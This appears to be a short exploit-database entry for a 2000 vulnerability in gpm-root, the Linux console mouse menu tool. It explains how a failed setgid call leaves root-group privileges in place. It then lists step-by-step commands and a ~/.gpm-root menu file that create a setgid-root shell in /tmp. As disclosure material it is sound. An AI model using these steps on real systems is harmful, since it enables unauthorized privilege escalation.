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gpm 1.18.1/1.19 / Debian 2.x / RedHat 6.x / S.u.S.E 5.3/6.x - gpm Setgid

🗓️ 22 Mar 2000 00:00:00Reported by Egmont KoblingerType 
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Vulnerability in gpm-root allows unauthorized access to a setgid shell via console manipulation.

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source: https://www.securityfocus.com/bid/1069/info

A vulnerability exists in the gpm-root program, part of the gpm package. This package is used to enable mice on the consoles of many popular Linux distributions. The problem is a design error, caused when a programmer chose to attempt to revert to the running users groups, after having called setuid to the users id already. The setgid call fails, and the process maintains the groups the gpm-root program is running as. This is usually the 'root' group.

This vulnerability requires the user have console access. 

cp /bin/sh /tmp
create a .gpm-root file in ~ with the following:
button 1 {
name "create a setgid shell"
"setgid shell" f.bgcmd "chgrp root /tmp/sh; chmod 2755 /tmp/sh"
}

click control-left mouse button, and click "setgid shell"
execute /tmp/sh 

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